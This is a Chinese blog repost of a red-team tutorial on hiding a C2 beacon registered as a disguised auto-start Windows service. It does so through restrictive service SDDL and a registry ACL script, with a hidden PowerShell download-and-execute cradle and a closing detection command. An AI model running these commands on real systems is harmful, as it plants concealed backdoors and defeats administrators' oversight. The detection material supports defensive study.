window权限维持——利用安全描述符隐藏服务后门进行权限维持

最新推荐文章于 2024-04-29 10:20:39 发布
最新推荐文章于 2024-04-29 10:20:39 发布
阅读量620 收藏 3
点赞数
分类专栏: # 红队技巧 # 权限维持 文章标签: 安全 网络
原文链接:https://mp.weixin.qq.com/s/zAQOfdbxtDNLha2fdSjWyw
版权

操作可参考:https://blog.csdn.net/nicai321/article/details/122424652

侵删
原创 oulaa [宽字节安全]

通过注册服务创建后门

将后门程序注册为自启动服务是我们常用的一种进行权限维持的方法,通常可以通过sc或者powershell来进行创建。

  • cmd创建自启动服务
sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\aa\Desktop\beacon.exe" depend= Tcpip obj= Localsystem start= auto
  • powershell创建自启动服务
new-service –Name ".NET CLR Networking 3.5.0.0" –DisplayName ".NET CLR Networking 3.5.0.0" –BinaryPathName "cmd.exe /k C:\Users\aa\Desktop\beacon.exe"  –StartupType AutomaticDelayedStart

但创建的服务很容易被发现 通过sc queryGet-Service很容易发现,直接查询服务也能看见

图片

通过修改SDDL(安全描述符)隐藏服务

众所周知,windows访问控制模型分为两部分:

  • access token(访问令牌)
  • 安全描述符

安全描述符包含与安全对象关联的安全信息。安全描述符包含安全描述符结构及其关联的安全信息。安全描述符可以包含以下安全信息:

  • 对象的所有者和主要组的 Sid(安全标识符)
  • 用于指定允许或拒绝特定用户或组的访问权限的 DACL 。
  • 指定为对象生成审核记录的访问尝试类型的 SACL 。
  • 一组限制安全描述符或其各个成员的含义的控制位。

windows中的安全对象都使用SDDL字符串来表示访问对象对于安全对象的权限,服务自然也存在其SDDL,并且sc命令中可以设置SDDL。那么通过更改SDDL可以修改服务的各种权限来隐藏服务:

sc sdset ".NET CLR Networking 3.5.0.0" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

图片

然后通过sc与get-server查找服务均无结果:

图片

并且服务也不再显示:

图片

在知道服务名的前提下查询会显示拒绝访问:

图片

但这样做有一个问题:在注册表中很容易看到异常value。

图片

修改注册表ACL

我们可以通过修改注册表的DACL来拒绝对值的查询,达到隐藏异常值的效果。

这里给出一个通过powershell修改注册表项的访问权限的简单脚本:

function Server-Sddl-Change{
[CmdletBinding()]
    param
    (
        [parameter(Mandatory=$false)][String]$Name
    )
$ROOT = "HKLM:\SYSTEM\CurrentControlSet\Services\"
$S = $ROOT+$NAME
$acl = Get-Acl $S
$acl.SetAccessRuleProtection($true, $false)

$person = [System.Security.Principal.NTAccount]"Everyone"
$access = [System.Security.AccessControl.RegistryRights]"QueryValues"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Deny"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)

$person = [System.Security.Principal.NTAccount]"Everyone"
$access = [System.Security.AccessControl.RegistryRights]"SetValue,CreateSubKey,EnumerateSubKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,ChangePermissions,TakeOwnership"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Allow"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)

Set-Acl $S $acl
}

远程加载powershell脚本:

powershell.exe -exec bypass -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://xxx:8000/s.ps1'));Server-Sddl-Change -Name '.NET CLR Networking 3.5.0.0'"

从下图可见已将值从该服务项中隐藏:

图片

SDDL字符串详解

安全描述符字符串格式(SDDL) 是用于存储或传输安全描述符中的信息的文本格式,更改SDDL即修改对象的访问权限。

如图为一个安全对象的SDDL:

图片

如图可见其基本组成为:

O:owner_sid 
G:group_sid 
D:dacl_flags(string_ace1)(string_ace2)... (string_acen) 
S:sacl_flags(string_ace1)(string_ace2)... (string_acen)
  • O: 对象所有者的SID
  • G:对象主组的SID
  • dacl_flags :应用于DACL的安全描述符控制标志
  • string_ace1:访问控制列表ACE

对每个组成的详细描述可以参考:https://docs.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format

访问控制列表ACE决定了哪个用户对它具有哪些权限,是DACL的具体规则,我们在服务中主要关注修改的就是DACL。

对于一个具体的ACE,其具有如下结构:

( 
ace_type; 
ace_flags; 
rights; 
object_guid; 
inherit_object_guid; 
account_sid; 
(resource_attribute)
)

对于每一个部分的详细解释可以参考:https://docs.microsoft.com/en-us/windows/win32/secauthz/ace-strings

对于一个ACE,我们主要关注的就是ace_type、rights、account_sid。

account_sid为该条ACE作用对象,可以是SID也可以是约定俗成的字符串,比如IU就是交互登录的用户。

ace_type代表了account_sid对rights代表的权限的控制,比如A就是允许,D就是拒绝。

它是由 ACE 控制的访问权限的字符串。此字符串可以是访问权限的十六进制字符串表示形式,例如“0x7800003F”,也可以是字符串的串联,比如“DCLC”。

在服务对象的权限字符串中:“DC” 代表的用户对服务配置修改的权限,而“LC” 代表了对服务状态查询的权限。

对于不同类型的对象,权限常量的名字还不是很统一,而Wayne Martin 在他的文章中给出了查找权限常量对应关系的方法,并给出一部分 ADS、SCM、Service、value、SDDL 的映射关系:

http://waynes-world-it.blogspot.com/2009/10/service-control-manager-security-for.html

所以在设置服务的SDDL的时候,我们设置了

D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)

表示为对交互登录的用户、服务登录的用户、内置管理员拒绝以下操作:

  • 服务配置修改
  • 服务状态查询
  • 服务停止
  • 暂停服务
  • 删除服务
  • 服务配置查询

主要是通过拒绝查询来达到隐藏服务的目的。

而对注册表权限的修改,是通过powershell实现的:首先可以通过枚举注册表的权限查看所有权限

[System.Enum]::GetNames([System.Security.AccessControl.RegistryRights])

这里给出的测试脚本是拒绝掉Everyone的QueryValues权限,也就是注册表查询值的权限,达到隐藏异常值的效果。也可以修改其他权限达到禁止删除、禁止重设权限等等操作。

隐藏服务的查找

Joshua Wright 团队给出了利用该种方式隐藏服务的反制措施:

Compare-Object -ReferenceObject (Get-Service | Select-Object -ExpandProperty Name | % { $_ -replace "_[0-9a-f]{2,8}$" } ) -DifferenceObject (gci -path hklm:\system\currentcontrolset\services | % { $_.Name -Replace "HKEY_LOCAL_MACHINE\\","HKLM:\" } | ? { Get-ItemProperty -Path "$_" -name objectname -erroraction 'ignore' } | % { $_.substring(40) }) -PassThru | ?{$_.sideIndicator -eq "=>"}

图片

而修改了注册表查询权限后会报拒绝访问

图片

参考资料

  • https://docs.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
  • https://www.freebuf.com/articles/system/254838.html
  • https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
  • http://waynes-world-it.blogspot.com/2009/10/service-control-manager-security-for.html
明月清风~~
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Window权限维持(六):BITS_Jobs1
08-03
1. 在创建参数需要作业的名称 2. 该addle需要文件的远程位置和本地路径 3. 该SetNotifyCmdLine将执行的命令 4. 所述SetMinRe
利用Window自带Ipsec安全策略对服务进行安全加固
01-10
说明:所有服务器上操作,请谨慎操作。确定后再次进行实施!仅仅是保护线路上的安全,以及网站被攻击后,客户端无法远程。 Ipsec安全策略 方法:设置安全策略。采用window的IPSec进行防护。允许80 3306端口。拒绝所有其他端口连接。 1:控制面板-系统和安全-管理工具-本地安全策略 打开本地安全策略。默认是没有的。这里我已经添加一个策略。 右键属性,直接点击添加 需要注意,该安全策略的排序方法是以英文字母数字类型来排序的。a开头在下边(首次不设置为拒绝,只允许) 鉴于是客户端访问固定服务器。所以我们这里直接默认 网络类型,我们采用所有网络连接 直接点击添加。这样就开始添加。
Window权限维持(三):新服务1
08-03
Window权限维持(三):新服务1
Window权限维持(七):安全支持提供者1
08-03
该技术可用于收集一个系统或多个系统中的凭据,并将这些凭据与另一个协议(例如RDP,WMI等)结合使用,以免干扰检测,从而在网络中保持持久性。向主机注入恶意安全
Malware Dev 02 - Windows SDDL 后门利用之 SCManager
0pr
03-02 693
Windows 访问控制,或者通常就叫权限,是随处可见的。每一个文件,每一个文件夹,甚至每一个注册表的键值,每一个服务,都有各自的权限(Permissions)。每个用户,或者组,对于一个文件的权限。每个用户,或者组,对于一个文件夹的权限。每个用户,或者组,对于一个注册表键值对的权限。以上看到的内容,就是 Windows 中,一个用户,或者组的 Access Control List(访问控制列表)。
Windows权限维持利用安全描述符隐藏服务后门
Longwaer
01-11 774
学习Windows权限维持利用安全描述符隐藏服务后门技术,更快知晓权限维持的妙用。
Windows权限维持技巧之利用安全描述符隐藏后门服务
weixin_44747030的博客
05-02 1570
Windows权限维持技巧之隐藏服务 0x01 前言 在内网渗透的时候为了防止目标关机重启等问题导致权限丢失,会采用将后门程序注册为自启动的服务(windows的服务会在开机时自动启动),让木马跟随服务的启动来回连我们的C2服务器,而在将木马注册为服务时,可以在注册表中查看到木马的文件路径,下面将通过安全描述符(SSDL)来隐藏注册表中的值。 0x02 原理 安全描述符windows访问控制模型的一部分,其中包含了与安全对象关联的安全信息。 SDDL由4个部分组成 DACL(D)-表示自主访问控制列表
SC实现隐藏Windows服务维持权限
XunanSec的博客
05-31 877
简介: sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用sc和Powershell程序来隐藏服务,搭到长期维持权限的效果。 创建服务 创建一个服务名为demo的自启动服务服务运行地址指向木马路径,以tcpip协议传输并以本地系统权限运行 sc create demo start= auto binPath="cmd.exe /k C:\tu.exe" depend= Tcpip obj= Localsystem 添加个描述 sc descr
Windows留后门--教程(一)——Windows系统隐藏账户
热门推荐
W小哥
03-14 1万+
一、Windows系统隐藏账户介绍 系统隐藏账户是一种最为简单有效的权限维持方式,其做法就是让攻击者创建一个新的具有管理员权限隐藏账户,因为是隐藏账户,所以防守方是无法通过控制面板或命令行看到这个账户的。 二、Windows系统添加隐藏账户-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 环境: windows Server2012 IP: 192.168.226.128 2.1 第一种情况:攻击者控制某台机器,并执行添加用户指令 n
文件特殊权限,文件访问控制列表,文件的隐藏属性!
SYH885的博客
10-06 332
文件的隐藏属性 Linux系统中的文件除了具备一般权限和特殊权限之外,还有一种隐藏权限,即被隐藏起来的权限,默认情况下不能直接被用户发觉。有用户曾经在生产环境和RHCE考试题目中碰到过明明权限充足但却无法删除某个文件的情况,或者仅能在日志文件中追加内容而不能修改或删除内容,这在一定程度上阻止了黑客篡改系统日志的图谋,因此这种“奇怪”的文件也保障了Linux系统的安全性。 chattr命令 chattr命令用于设置文件的隐藏权限,格式为“chattr [参数] 文件”。如果想要把某个隐藏功能添加到文件上,则需
Window权限维持(八):时间服务器1
08-03
但是,此方法需要管理员级别的特权,因为指向时间提供者DLL文件的注册表项存储在HKEY_LOCAL_MACHINE中。时间提供者–恶意DLL该服务将在Windo
Window权限维持(一):注册表运行键.pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
windows 访问控制模型(二)之安全描述符
ShadowAssassin的专栏
08-12 5348
安全对象Securable Object是拥有SD的Windows的对象。 所有的被命名的Windows的对象都是安全对象。一些没有命名的对象是安全对象,如:进程和线程,也有安全描述符SD。安全对象Securable Object是拥有SD的Windows的对象。 在 Windows系统中,其是用一个安全描述符(Security Descriptors)的结构来保存其权限的设置信息,简称为SD
内网权限维持
m0_55751267的博客
11-22 1106
事实上在该过程中,Windows还会在注册表的上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同的子键,就查询对应子健中包含的“Dubugger”键值名,并用其指定的程序路径来代替原始的程序,之后执行的是遭到“劫持”的虚假程序。管理员权限后门可以设置更多的计划任务,例如重启后运行等。Run中的程序是WINDOWS初始化后才运行的,而RunService中的程序是在操作系统启动时就开始运行的,也就是说RunServices中的程序先于Run中的程序运行,如电源管理程序。反弹管理员shell。
Windows安全描述符SECURITY_DESCRIPTOR
学而不思则罔
01-07 3165
安全对象Securable Object是拥有SD的Windows的对象。 所有的被命名的Windows的对象都是安全对象。一些没有命名的对象是安全对象,如:进程和线程,也有安全描述符SD。安全对象Securable Object是拥有SD的Windows的对象。 在 Windows系统中,其是用一个安全描述符(Security Descriptors)的结构来保存其权限的设置信息,简称为SD
什么是安全描述符
weixin_34015860的博客
10-26 335
see also:http://alt.pluralsight.com/wiki/default.aspx/Keith.GuideBook/WhatIsASecurityDescriptor.html Each object protected by the Windows discretionary access control system must have some state asso...
Python + twilio 实现打电话和发短信功能
xgh1951的博客
03-07 1万+
相信大家生活中常常会有接到骚扰电话的经历,电话接通后发现是个机器人说话而不是真人!当时就想这又是哪个黑心厂家招人写了垃圾程序来祸国殃民,真的是气不打一处来! 今天快下班时候突然想起这个,就想着用python写一个随机打电话的脚本,其实脚本很简单很简单! 无非就是用python 的 os 模块来执行adb命令来实现打电话的功能! 废话不多说,代码如下,很简单,0基础的直接copy,天上号码就o...
权限维持(什么是后门?如何留后门?)-Windows篇 (゚益゚メ) 渗透测试
寻觅的博客
09-12 2059
来看看如何做开机自启!我们渗透一定要持久!
4月份全球市场推出的18款网络安全热点产品和服务:生成式AI应用主导安全产品创新
最新发布
lurenjia404的博客
04-29 745
CSO在线追踪了4份全球市场推出的18代表性网络安全产品和服务,从中可以观察网络安全产品创新趋势和风向。
window11这么检查用户权限和系统安全设置
06-02
Windows 11通过用户账户控制(UAC)来检查...此外,Windows 11还提供了一系列安全功能,如Windows Defender防病毒软件、Windows防火墙等,来保护系统的安全性。用户可以通过控制面板和设置应用程序来管理这些安全功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值